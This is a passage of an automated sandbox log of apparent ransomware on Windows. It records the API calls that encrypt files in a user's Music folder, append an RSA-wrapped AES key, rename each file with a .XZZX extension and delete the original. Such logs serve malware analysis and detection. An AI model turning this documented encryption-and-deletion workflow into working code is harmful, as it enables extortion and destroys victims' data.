lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.485] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0113.485] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0113.485] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x4d4) returned 0x0 [0113.486] RegQueryValueExW (in: hKey=0x4d4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x68, lpcbData=0x420dfdc*=0x4) returned 0x0 [0113.486] RegCloseKey (hKey=0x4d4) returned 0x0 [0113.486] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x4d4) returned 0x0 [0113.486] RegSetValueExW (in: hKey=0x4d4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x69, cbData=0x4 | out: lpData=0x420dfec*=0x69) returned 0x0 [0113.486] RegCloseKey (hKey=0x4d4) returned 0x0 [0113.486] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.486] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.487] CloseHandle (hObject=0x4c8) returned 1 [0113.488] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0113.489] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0113.489] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk")) returned 1 [0113.490] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk")) returned 0 Thread: id = 349 os_tid = 0x874 [0113.498] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.498] lstrcpyW (in: lpString1=0x420f460, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0113.498] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.498] SetErrorMode (uMode=0x1) returned 0x1 [0113.498] lstrcpyW (in: lpString1=0x420f860, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0113.498] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4f625d0d, Data2=0x4864, Data3=0x4de8, Data4=([0]=0x8b, [1]=0xdf, [2]=0xd, [3]=0x58, [4]=0x5b, [5]=0x8c, [6]=0x90, [7]=0x7b))) returned 0x0 [0113.499] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned 77 [0113.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.499] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\AC9801141607AEA04F625D0D1A2892E8.XZZX") returned 77 [0113.499] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 350 os_tid = 0x878 [0113.653] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.653] lstrcpyW (in: lpString1=0x420f460, lpString2="2_r9zrnyCzzJ.mp3" | out: lpString1="2_r9zrnyCzzJ.mp3") returned="2_r9zrnyCzzJ.mp3" [0113.653] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.653] SetErrorMode (uMode=0x1) returned 0x1 [0113.653] lstrcpyW (in: lpString1=0x420f860, lpString2="2_r9zrnyCzzJ.mp3" | out: lpString1="2_r9zrnyCzzJ.mp3") returned="2_r9zrnyCzzJ.mp3" [0113.653] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x910c485d, Data2=0x965b, Data3=0x419f, Data4=([0]=0xa2, [1]=0xca, [2]=0x3e, [3]=0x8f, [4]=0xb3, [5]=0x59, [6]=0x30, [7]=0x5b))) returned 0x0 [0113.653] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2_r9zrnyCzzJ.mp3") returned 56 [0113.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.653] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned 77 [0113.653] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="XZZX") returned 0x0 [0113.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2_r9zrnyCzzJ.mp3", dwFileAttributes=0x20) returned 1 [0113.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2_r9zrnyCzzJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2_r9zrnyczzj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0113.655] ReadFile (in: hFile=0x4d8, lpBuffer=0x3cbcfc8, nNumberOfBytesToRead=0x5748, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cbcfc8*, lpNumberOfBytesRead=0x420e418*=0x5748, lpOverlapped=0x0) returned 1 [0113.656] CloseHandle (hObject=0x4d8) returned 1 [0113.656] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0113.657] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0113.657] SetErrorMode (uMode=0x1) returned 0x1 [0113.657] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0113.657] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3a9828) returned 1 [0113.662] CryptGenKey (in: hProv=0x3a9828, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5590) returned 1 [0113.855] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0113.855] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0113.855] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0113.856] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0113.856] CryptDestroyKey (hKey=0x3a5590) returned 1 [0113.856] CryptReleaseContext (hProv=0x3a9828, dwFlags=0x0) returned 1 [0113.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C1C4370F268A7D85910C485D2AAB61CD.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\c1c4370f268a7d85910c485d2aab61cd.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0113.857] WriteFile (in: hFile=0x4e4, lpBuffer=0x3cbcfc8*, nNumberOfBytesToWrite=0x5748, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cbcfc8*, lpNumberOfBytesWritten=0x420e438*=0x5748, lpOverlapped=0x0) returned 1 [0113.857] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5748 [0113.857] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.857] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x574d [0113.857] WriteFile (in: hFile=0x4e4, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x20, lpOverlapped=0x0) returned 1 [0113.858] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x576d [0113.858] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.858] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5772 [0113.858] SetErrorMode (uMode=0x1) returned 0x1 [0113.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0113.858] OutputDebugStringW (lpOutputString="end") [0113.858] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0113.858] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0113.858] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5998) returned 1 [0113.859] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5998, dwCertEncodingType=0x1, pInfo=0x3cb0658*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0688*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0690*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a56d0) returned 1 [0113.859] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0113.859] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0113.859] CryptEncrypt (in: hKey=0x3a56d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0113.859] CryptEncrypt (in: hKey=0x3a56d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5a20*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5a20*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0113.859] WriteFile (in: hFile=0x4e4, lpBuffer=0x3cc5a20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5a20*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0113.859] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0113.859] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.859] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0113.860] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0113.860] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x4e8) returned 0x0 [0113.860] RegQueryValueExW (in: hKey=0x4e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x69, lpcbData=0x420dfdc*=0x4) returned 0x0 [0113.860] RegCloseKey (hKey=0x4e8) returned 0x0 [0113.860] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x4e8) returned 0x0 [0113.860] RegSetValueExW (in: hKey=0x4e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x6a, cbData=0x4 | out: lpData=0x420dfec*=0x6a) returned 0x0 [0113.860] RegCloseKey (hKey=0x4e8) returned 0x0 [0113.860] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.860] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.860] CloseHandle (hObject=0x4e4) returned 1 [0113.861] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0113.862] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0113.862] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2_r9zrnyCzzJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2_r9zrnyczzj.mp3")) returned 1 [0113.862] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2_r9zrnyCzzJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2_r9zrnyczzj.mp3")) returned 0 Thread: id = 351 os_tid = 0x880 [0113.863] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.863] lstrcpyW (in: lpString1=0x434f460, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0113.863] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.863] SetErrorMode (uMode=0x1) returned 0x1 [0113.863] lstrcpyW (in: lpString1=0x434f860, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0113.864] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x81ad067a, Data2=0xbbc, Data3=0x426f, Data4=([0]=0xa2, [1]=0x33, [2]=0x81, [3]=0xc0, [4]=0x81, [5]=0x6b, [6]=0x3a, [7]=0xea))) returned 0x0 [0113.864] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned 77 [0113.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.864] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\AA57FF98030B8E8481AD067A074072CC.XZZX") returned 77 [0113.864] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 352 os_tid = 0x884 [0113.996] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.996] lstrcpyW (in: lpString1=0x420f460, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0113.996] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.996] SetErrorMode (uMode=0x1) returned 0x1 [0113.996] lstrcpyW (in: lpString1=0x420f860, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0113.996] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x41fdb897, Data2=0xd572, Data3=0x448b, Data4=([0]=0x9d, [1]=0xd6, [2]=0x0, [3]=0x4b, [4]=0x2, [5]=0x64, [6]=0x47, [7]=0x15))) returned 0x0 [0113.996] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3DAB40862FBD462437E5810B348A2A6C.XZZX") returned 77 [0113.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.996] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7D91D63E39262CE641FDB8973D47112E.XZZX") returned 77 [0113.996] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 353 os_tid = 0x888 [0114.152] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.152] lstrcpyW (in: lpString1=0x420f460, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: 